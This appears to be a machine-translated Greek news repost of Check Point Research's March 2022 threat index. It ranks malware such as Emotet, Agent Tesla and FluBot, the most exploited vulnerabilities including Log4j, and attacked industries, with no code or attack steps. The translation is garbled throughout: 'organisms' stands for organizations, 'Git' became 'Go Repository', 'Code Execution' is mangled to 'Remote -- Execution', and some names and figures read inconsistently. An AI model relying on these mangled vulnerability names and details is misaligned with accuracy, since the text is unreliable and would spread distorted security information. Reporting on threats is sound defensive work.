As the most popular malware and in March remains Emotet, affecting it 10% of organizations worldwide.
ΤEmotet affects twice as many organisms as February reports in Global Threat Index for March 2022 η Check Point ResearchWhile agent tesla goes from fourth to second place after several malicious spam campaigns.
The Emotet is an advanced, self-propagating and modular trojan which uses multiple methods to maintain resilience and avoidance techniques to avoid detection. Since its return last November and the recent announcement that Trickbot has been down, Emotet strengthens its position as the most widespread malware. This has been further consolidated this month as many aggressive e-mail campaigns distribute the botnet, including various attempts. Phishing on the theme of Easter, taking advantage of the start of the festive season. These emails were sent to victims around the world, such as one entitled "good afternoon, happy easter", To which was attached a malicious XLS file for the delivery of Emotet.
This month, the agent tesla, the advanced RAT that works as keylogger and steals information, is the second most common malware, after the fourth place in the list last month. His rise agent tesla is due to several new malicious spam campaigns distributing RAT via malicious xlsx / pdf files worldwide. Some of them used the Russia / Ukraine war to lure their victims.
In view of Holy Saturday and Easter Sunday, expect to see more of these scams and urge users to pay close attention, even if the email appears to be from a trusted source. Easter is not the only holiday and cyber criminals will continue to use the same tactics to cause harm. This month we also noticed that the apachelog4j became again the number one vulnerability with the most exploitation. Even after all the talk about this vulnerability at the end of last year, it still causes damage months after it was first identified. Organizations must take immediate action to prevent attacks., said Maya Horowitz, VP Research in Check Point Software.
Η CPR also revealed this month that education / research is still the number one industry with the most attacks, followed by government / military sector and Internet service providers / managed service providers (ISP / MSP). THE "Web Server Exposed Git Repository Information DisclosureIs now the second most frequently exploited vulnerability, affecting 26% of organizations worldwide, while the "Apache Log4j Remote Code Execution”Occupies the first place, influencing it 33% of organizations. The "HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756)Maintains third place with an impact of 26% worldwide.
Top Malware Families
*The arrows refer to the change of the ranking in relation to the previous month.
This month, the Emotet is still the most popular malware with a global impact 10% of organizations worldwide, followed by Agent Tesla and XMRig with impact 2% of organisms each.
- ↔ Emotet - evolved modular trojan self-reproducing. The Emotet once served as a scam bank account spy and recently used to distribute other malware or propaganda campaigns malware. It uses many methods and avoidance techniques to stay in the system and avoid detection. In addition, it can be spread through spam Email phishing (Phishing) containing attachments or links to malicious content.
- ↑ Agent Tesla - THE Agent Tesla is an advanced one RAT that works as keylogger and information thief, which is capable of monitoring and collecting the victim's keyboard input, the system keyboard, taking screenshots, and extracting credentials to various software installed on the victim's machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook Email client).
- ↑ XMRig - The XMRig is a mining software CPU open source used for the cryptocurrency mining process Monero and debuted in May 2017.
Top attacking industries worldwide
This month the Education / Research is the number one industry with the most attacks in the world, followed by the government / army and ISP / MSP.
- Education / Research
- Government / Army
- ISP / MSP
The most exposed vulnerabilities
This month the "Apache log4j Remote -- Execution" is the most commonly exploited vulnerability, affecting it 33% of organizations worldwide, followed by “ Website Server & Hosting Exposed Go Repository Information Disclosure ", Which fell from first to second place and affects 26% of organizations worldwide. THE "HTTP Headers Remote -- ExecutionIs still in third place on the list of vulnerabilities with the most farms, with an impact 26% worldwide.
- ↑ Apache log4j Remote -- Execution (CVE-2021-44228) - A remote code execution vulnerability exists in Apache log4j. Successfully exploiting this vulnerability could allow a remote intruder to execute arbitrary code on the affected system.
- ↓ Website Server & Hosting Exposed Go Repository Information Disclosure A vulnerability to disclosing information was reported in Go Repository. Successfully exploiting this vulnerability could allow unintentional disclosure of account information.
- ↔ HTTP Headers Remote -- Execution (CVE-2020-10826,CVE-2020-10827,CVE-2020-10828,CVE-2020-13756) - The HTTP headers allow the client and server to transmit additional information with a request HTTP. A remote intruder can use a vulnerable header HTTP to execute arbitrary code on the victim's machine.
The main malware for mobile phones
This month the AlienBot is the most common mobile malware, followed by xHelper and FluBot.
- AlienBot - The malware family AlienBot it is a Malware-as-a-Service (MaaS) for devices Android which allows a remote intruder, in the first instance, to introduce malicious code into legitimate financial applications. The attacker gains access to the victims' accounts and eventually takes full control of their device.
- xHelper - A malicious application released by March of 2019 and is used to download other malicious applications and display ads. The application is capable of being hidden from the user and reinstalled if uninstalled.
- flubot - The flubot is a malware Android distributed via messages SMS phishing (Smishing), which most often imply delivery marks Logistics. Once the user clicks on the link in the message, they are redirected to download a fake application that contains the flubot. Once installed, the malware has various capabilities for collecting credentials and supporting the business itself. Smishing, including uploading contact lists and sending messages SMS to other telephone numbers.
The complete list of the most common malware threats in Greece for March 2022 is:
Emotet - evolved modular trojan self-reproducing. Emotet once served as a Trojan horse for spying on bank accounts and has recently been used to distribute other malware or malware campaigns. It uses many avoidance methods and techniques to stay in the system and avoid detection. Additionally, it may be spread by spam emails containing phishing attachments or links.
Lokibot - The LokiBot was first identified February of 2016 and is a commodity infostealer with versions for both Windows and AndroidOS. Collects credentials from various applications, web browsers, e-mail programs, IT management tools such as PuTTY and other. The LokiBot is sold in a hacking forum and it is believed that its source code was leaked, thus allowing the appearance of numerous variations. As of late 2017, some versions of LokiBot for Android include ransomware functionality in addition to the ability to steal information.
agent Tesla - The agent Tesla is an advanced one RAT which operates as a keylogger and password thief and has been active since 2014. The agent Tesla can monitor and collect victim input's keyboard and clipboard, and can capture screenshots and extract credentials for various software installed on the victim's machine (including Google Chrome, Mozilla Firefox, and Microsoft Outlook email client ). The agent Tesla sold in various online markets and hacking forums.
Remcos - THE Remcos he is one RAT first appeared in the wild in 2016. Remcos is distributed through its malicious documents Microsoft Office, which are attached to emails SPAM, and is designed to bypass Microsoft Windowss UAC security and run malicious software with high privileges.
Qrat - The QRat it is a Trojan remote access based on Java, which also acts as a backdoor with keylogging and other espionage tools. The QRat was introduced in 2015 and has since been sold as a MaaS model in various forums.
XMRig -The XMRig is an open source CPU mining software used to extract cryptocurrency Monero. Threateners often abuse this open source software by embedding it in their malware to carry out illegal mining on victims' devices.
Ο Global Threat Impact List and Check Point Software ThreatCloud Map, based on ThreatCloud intelligence of the Company, in the largest cooperation network for the fight against cybercrime, which provides data on the threats and trends prevailing in attacks, utilizing a global network of threat detectors.
The database ThreatCloud includes over 3 billion websites and 600 million files daily and detects more than 250 million malware activities every day.
Press Release
Do not forget to follow it Xiaomi-miui.gr on Google News to be informed immediately about all our new articles! You can also if you use RSS reader, add our page to your list by simply following this link >> https://news.xiaomi-miui.gr/feed/gn
Follow us on Telegram so that you are the first to learn our every news!
